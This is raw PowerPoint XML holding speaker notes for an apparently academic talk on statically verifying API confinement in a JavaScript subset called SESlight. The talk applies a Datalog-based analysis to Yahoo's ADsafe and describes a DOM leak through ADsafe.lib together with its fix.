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notesSlides/notesSlide24.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.notes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Default Extension="pdf" ContentType="application/pdf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notesSlides/notesSlide2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60" r:id="rId4"/>
    <p:sldId id="337" r:id="rId5"/>
    <p:sldId id="300" r:id="rId6"/>
    <p:sldId id="301" r:id="rId7"/>
    <p:sldId id="339" r:id="rId8"/>
    <p:sldId id="317" r:id="rId9"/>
    <p:sldId id="364" r:id="rId10"/>
    <p:sldId id="357" r:id="rId11"/>
    <p:sldId id="326" r:id="rId12"/>
    <p:sldId id="340" r:id="rId13"/>
    <p:sldId id="353" r:id="rId14"/>
    <p:sldId id="274" r:id="rId15"/>
    <p:sldId id="306" r:id="rId16"/>
    <p:sldId id="329" r:id="rId17"/>
    <p:sldId id="330" r:id="rId18"/>
    <p:sldId id="344" r:id="rId19"/>
    <p:sldId id="371" r:id="rId20"/>
    <p:sldId id="284" r:id="rId21"/>
    <p:sldId id="268" r:id="rId22"/>
    <p:sldId id="366" r:id="rId23"/>
    <p:sldId id="287" r:id="rId24"/>
    <p:sldId id="352" r:id="rId25"/>
    <p:sldId id="350" r:id="rId26"/>
    <p:sldId id="313" r:id="rId27"/>
    <p:sldId id="288" r:id="rId28"/>
    <p:sldId id="293" r:id="rId29"/>
    <p:sldId id="294" r:id="rId30"/>
    <p:sldId id="29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5BDB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4875" autoAdjust="0"/>
    <p:restoredTop sz="84503" autoAdjust="0"/>
  </p:normalViewPr>
  <p:slideViewPr>
    <p:cSldViewPr snapToObjects="1">
      <p:cViewPr>
        <p:scale>
          <a:sx n="100" d="100"/>
          <a:sy n="100" d="100"/>
        </p:scale>
        <p:origin x="-1160" y="-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10EE0-C643-3B44-9101-32F877A6AE19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234D1-7ECD-6D47-B274-0C4649A4E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1A330-5EC4-0049-91AE-120728EE034B}" type="datetimeFigureOut">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:pPr/>
              <a:t>2/15/12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0929A-3812-B543-9319-314D326FF5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None/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2600" baseline="0" dirty="0" smtClean="0"/>
              <a:t>We are not interested in solving the confinement problem for arbitrary APIs.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We are only interested in security-critical wrapper APIs which are typically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part of the TCB, are small, disciplined and use code patterns that are easy to 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reason about. This is because these APIs are typically subject to lot of manual code reviews.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Leveraging these properties, it seems like a conservative and scalable program analysis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can perform well on such API implementations and will also server the dual purpose of</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buFont typeface="+mj-lt"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2600" baseline="0" dirty="0" smtClean="0"/>
              <a:t> keeping  a check on the developers if they deviate from writing disciplined and simple code</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buFont typeface="+mj-lt"/>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="2600" baseline="0" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buFont typeface="+mj-lt"/>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="26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Standardized</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" smtClean="0"/>
              <a:t> JS is an evolving language with the 5</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="30000" dirty="0" smtClean="0"/>
              <a:t>th</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" smtClean="0"/>
              <a:t> edition being the most recent standard</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" smtClean="0"/>
              <a:t>The 5</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="30000" dirty="0" smtClean="0"/>
              <a:t>th</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" smtClean="0"/>
              <a:t> edition also has a strict mode which brings in standard properties like lexical scoping</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" smtClean="0"/>
              <a:t>Closure based encapsulation and isolation of global objects to the language.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" smtClean="0"/>
              <a:t>These are very standard properties which were absent in ES3. For instance in </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>ES3 if you call a function then the function could a pointer into</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" smtClean="0"/>
              <a:t> your activation record which </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" smtClean="0"/>
              <a:t>basically</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" smtClean="0"/>
              <a:t>b</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" smtClean="0"/>
              <a:t>reak </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" smtClean="0"/>
              <a:t>closure based encapsulation. This is disallowed in ES5-strict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SSElight</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" smtClean="0"/>
              <a:t> which is the subset we </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" smtClean="0"/>
              <a:t>define </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" smtClean="0"/>
              <a:t>is ES5strict + 3 restrictions</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" smtClean="0"/>
              <a:t>Frozen </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" err="1" smtClean="0"/>
              <a:t>builtin</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" smtClean="0"/>
              <a:t> which mean you can write to or read any properties of the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" err="1" smtClean="0"/>
              <a:t>builtin</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" smtClean="0"/>
              <a:t> objects</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" smtClean="0"/>
              <a:t>No support for setters and getters and a finally a restriction on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restriction</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" smtClean="0"/>
              <a:t> on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 is that the call </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" smtClean="0"/>
              <a:t>site </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" smtClean="0"/>
              <a:t>should explicitly list the free variables on the code being </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" err="1" smtClean="0"/>
              <a:t>evaled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So in the example, since the variable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is free, we must list it in the call site</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" smtClean="0"/>
              <a:t>The semantic restriction is that the code is </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" err="1" smtClean="0"/>
              <a:t>evaled</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" smtClean="0"/>
              <a:t> only if the set of free variables are contained in the list provided.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" smtClean="0"/>
              <a:t>This is useful during program analysis as it allows an upper bound  to be established on the side effects that happen during  the execution of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</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" smtClean="0"/>
              <a:t> defined a small step style operational semantics for the language </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" err="1" smtClean="0"/>
              <a:t>seslight</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" baseline="0" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" smtClean="0"/>
              <a:t>And formally prove that alpha renaming of bound </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" err="1" smtClean="0"/>
              <a:t>vars</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" smtClean="0"/>
              <a:t> is semantics preserving, which means that the</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" err="1" smtClean="0"/>
              <a:t>seslight</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" smtClean="0"/>
              <a:t> is a lexically scoped language. </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" smtClean="0"/>
              <a:t>Using this we can define a simple language for untrusted </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" err="1" smtClean="0"/>
              <a:t>sesl</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" smtClean="0"/>
              <a:t> code. </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" smtClean="0"/>
              <a:t>We store the API is some variable “</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" err="1" smtClean="0"/>
              <a:t>api</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" smtClean="0"/>
              <a:t>” and then restrict</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" smtClean="0"/>
              <a:t>Untrusted code to have “</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" err="1" smtClean="0"/>
              <a:t>api</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" smtClean="0"/>
              <a:t>” as it only free variable and in fact this restriction can be imposed by </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" smtClean="0"/>
              <a:t>simplifying </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" smtClean="0"/>
              <a:t>the wrapping the code with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.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now move to solving the API confinement problem,</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" smtClean="0"/>
              <a:t> recall that confinement means that no sandboxed untrusted code must be able to use the API to obtain a critical reference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</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>first step is to define</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" smtClean="0"/>
              <a:t> a predicate Confine that take a trusted API implementation </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" err="1" smtClean="0"/>
              <a:t>t</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" smtClean="0"/>
              <a:t> and a set of critical references.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" smtClean="0"/>
              <a:t>The code that executes in the system is as follows. Here the untrusted code is allowed two free variables, </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" smtClean="0"/>
              <a:t>“</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" err="1" smtClean="0"/>
              <a:t>Api</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" smtClean="0"/>
              <a:t>” which holds the API object and “test” which is the challenge variable – untrusted code wins if it sets “test” to a </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" smtClean="0"/>
              <a:t>critical </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" smtClean="0"/>
              <a:t>reference.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" smtClean="0"/>
              <a:t>This is done to set up the problem. So confinement basically means that the points-to set of “test” during the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" smtClean="0"/>
              <a:t>entire </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" smtClean="0"/>
              <a:t>execution trace never</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" smtClean="0"/>
              <a:t>Contains a critical reference and this must hold for ALL untrusted programs.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" smtClean="0"/>
              <a:t>Using this we can formally define the predicate Confine.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main hurdle in statically verifying</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" smtClean="0"/>
              <a:t> this predicate is the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" err="1" smtClean="0"/>
              <a:t>forall</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" smtClean="0"/>
              <a:t> quantification and the analysis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Recall that our goal is to apply our analysis only to implementation of security critical APIs which</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" smtClean="0"/>
              <a:t>Are disciplined and simple.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" smtClean="0"/>
              <a:t>So we choose a conservative flow-insensitive and context-insensitive program analysis which means we are not sensitive to the order of the statements</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" smtClean="0"/>
              <a:t>And we only allocate  single activation record for all calls to a function.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" smtClean="0"/>
              <a:t>We label each statement in the program and abstract heap locations by their creation site line number.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" smtClean="0"/>
              <a:t>Finally we analyze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 conservatively only based on the free variable provided and thus mitigate overcome hurdles stated above</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" smtClean="0"/>
              <a:t>As the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" err="1" smtClean="0"/>
              <a:t>forall</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" smtClean="0"/>
              <a:t> quantification goes way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analysis is expressed in </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" err="1" smtClean="0"/>
              <a:t>datalog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For each statement in the program we have a specific predicate in </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" err="1" smtClean="0"/>
              <a:t>datalog</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" smtClean="0"/>
              <a:t>,</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" smtClean="0"/>
              <a:t>for the little program here, the statement </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" err="1" smtClean="0"/>
              <a:t>var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= {} is encode as stack(y,l1) where</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" smtClean="0"/>
              <a:t>L1 is the label of the statement and abstract element for the object allocated.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" err="1" smtClean="0"/>
              <a:t>x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is encoded as </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" err="1" smtClean="0"/>
              <a:t>assign(x,y</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" smtClean="0"/>
              <a:t>) and </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" err="1" smtClean="0"/>
              <a:t>x.f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is encoded as </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" err="1" smtClean="0"/>
              <a:t>store(x,f,y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Thus we have obtained an abstract representation of the program as a set</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" smtClean="0"/>
              <a:t>logical facts expressed in </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" err="1" smtClean="0"/>
              <a:t>Datalog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The semantics of the language is abstracted a set of horn clauses. For example if</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" err="1" smtClean="0"/>
              <a:t>Assign(x,y</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" smtClean="0"/>
              <a:t>) holds and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points to </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" err="1" smtClean="0"/>
              <a:t>l</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" smtClean="0"/>
              <a:t> on the stack then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point to </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" err="1" smtClean="0"/>
              <a:t>l</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" smtClean="0"/>
              <a:t> on the stack.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" smtClean="0"/>
              <a:t>Thus by churning the facts with respect to the horn clauses we can derive all relationships</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" smtClean="0"/>
              <a:t>That can be true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complete list of predicates is as shown</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" smtClean="0"/>
              <a:t> here.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" smtClean="0"/>
              <a:t>These are </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" smtClean="0"/>
              <a:t>sufficient </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" smtClean="0"/>
              <a:t>to model all programs in </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" err="1" smtClean="0"/>
              <a:t>SESlight</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" smtClean="0"/>
              <a:t> and all subtleties of the language semantics like implicit type conversions and reflection.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websites today include</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" smtClean="0"/>
              <a:t> 3</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="30000" dirty="0" smtClean="0"/>
              <a:t>rd</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" smtClean="0"/>
              <a:t> party code in the form of ads, maps, social networking code.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" smtClean="0"/>
              <a:t>This code usually contains a lot of JS that executes together with the hosting page code to provide a rich user experience.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3">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>We</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" smtClean="0"/>
              <a:t> applied our analysis on the Yahoo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API and a couple of benchmark examples from the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" err="1" smtClean="0"/>
              <a:t>OCaps</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" smtClean="0"/>
              <a:t>literature.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="457200" lvl="3">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" smtClean="0"/>
              <a:t>Both these fit our specification of simple small and disciplined code.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Adsafe</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" smtClean="0"/>
              <a:t> is a mechanism for safely embedding advertisements.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" smtClean="0"/>
              <a:t>The security mechanism follows under the API + Sandbox paradigm</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" smtClean="0"/>
              <a:t>with the</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" smtClean="0"/>
              <a:t> ADSAFE object </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" smtClean="0"/>
              <a:t>being the API and </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" err="1" smtClean="0"/>
              <a:t>JSLint</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" smtClean="0"/>
              <a:t>being the sandbox.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object provides mediated access to the DOM and is implemented</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" baseline="0" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" smtClean="0"/>
              <a:t>in </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" smtClean="0"/>
              <a:t>approx 2000 LOC. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" err="1" smtClean="0"/>
              <a:t>Jslint</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" smtClean="0"/>
              <a:t> is a static filter for JS and restricts code to</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" smtClean="0"/>
              <a:t> ONLY </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" smtClean="0"/>
              <a:t>access </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" smtClean="0"/>
              <a:t>the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API. The security goal is confinement of the DOM.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analyze</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" smtClean="0"/>
              <a:t> DOM confinement for the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API implementation with respect to sandboxed untrusted code in </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" err="1" smtClean="0"/>
              <a:t>SESlight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Our first step was to </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" err="1" smtClean="0"/>
              <a:t>desugar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implmentation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SESlight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Next we add trusted  annotations to property lookups in order to improve the precision of the analysis.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" smtClean="0"/>
              <a:t>For instance, inside for-loops if the loop index is being accessed then we annotate it as Nat as it clear that the loop index is always a number.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" smtClean="0"/>
              <a:t>On running </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" err="1" smtClean="0"/>
              <a:t>encap</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" smtClean="0"/>
              <a:t>, which approx took 5mins we obtained that result NOT CONFINED with </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" err="1" smtClean="0"/>
              <a:t>ADSafe.lib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AdSAfe.go</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" smtClean="0"/>
              <a:t> as the culprits</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" smtClean="0"/>
              <a:t>Which </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" err="1" smtClean="0"/>
              <a:t>mens</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" smtClean="0"/>
              <a:t> if these methods were exposed on the API then the DOM leaks.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was a real exploit.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>I am not going to go into the details</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" smtClean="0"/>
              <a:t> but the idea is similar to the attack we saw on the write-only log API.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" smtClean="0"/>
              <a:t>The method </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" err="1" smtClean="0"/>
              <a:t>Adsafe.lib</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" smtClean="0"/>
              <a:t> can be used to add an unanticipated property ___nodes___ to an internal data structure.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fix is easy we add</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" smtClean="0"/>
              <a:t> a check in the beginning of </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" err="1" smtClean="0"/>
              <a:t>Adsafe.lib</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" smtClean="0"/>
              <a:t> that the property name accessed is not ___nodes__</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" smtClean="0"/>
              <a:t>This is also the fix currently adopted by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On running ENCAP we obtained the result CONFINED which means that practically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is confined</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" smtClean="0"/>
              <a:t>under the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" err="1" smtClean="0"/>
              <a:t>SESlight</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" smtClean="0"/>
              <a:t> threat model, assuming the annotations hold.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</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" smtClean="0"/>
              <a:t> two points the same</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" smtClean="0"/>
              <a:t>Third point broken in two</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" smtClean="0"/>
              <a:t>Lots of small technical improvements one can make</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" smtClean="0"/>
              <a:t>Large research agenda on the interplay between software engineering and security analysis tools (for confinement), with improved precision, support for more flexible coding patterns, etc. etc. all being options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ADD A THIRD POINT TO THE CONCLUSIONS – on the lines of keeping a check on developers	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Lets</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" smtClean="0"/>
              <a:t> look at the specific case of ads that are directly embedded into the page.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" smtClean="0"/>
              <a:t>Many ads wish to decorate the hosting page and move around, which they do by invoking the DOM API of the page.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Because</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" smtClean="0"/>
              <a:t> the entire DOM is directly exposed to the ad code, the page is vulnerable to a range of attacks</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" smtClean="0"/>
              <a:t>if the embedded code is malicious. For example it cans steal the password and send it off to a third party location.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" smtClean="0"/>
              <a:t>So it is important that untrusted ads must only have restricted access to the DOM.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Lets look</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" smtClean="0"/>
              <a:t> at one popular approach for sandboxing untrusted JS.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" smtClean="0"/>
              <a:t>It is used </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" smtClean="0"/>
              <a:t>by </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" err="1" smtClean="0"/>
              <a:t>Facebook</a:t>
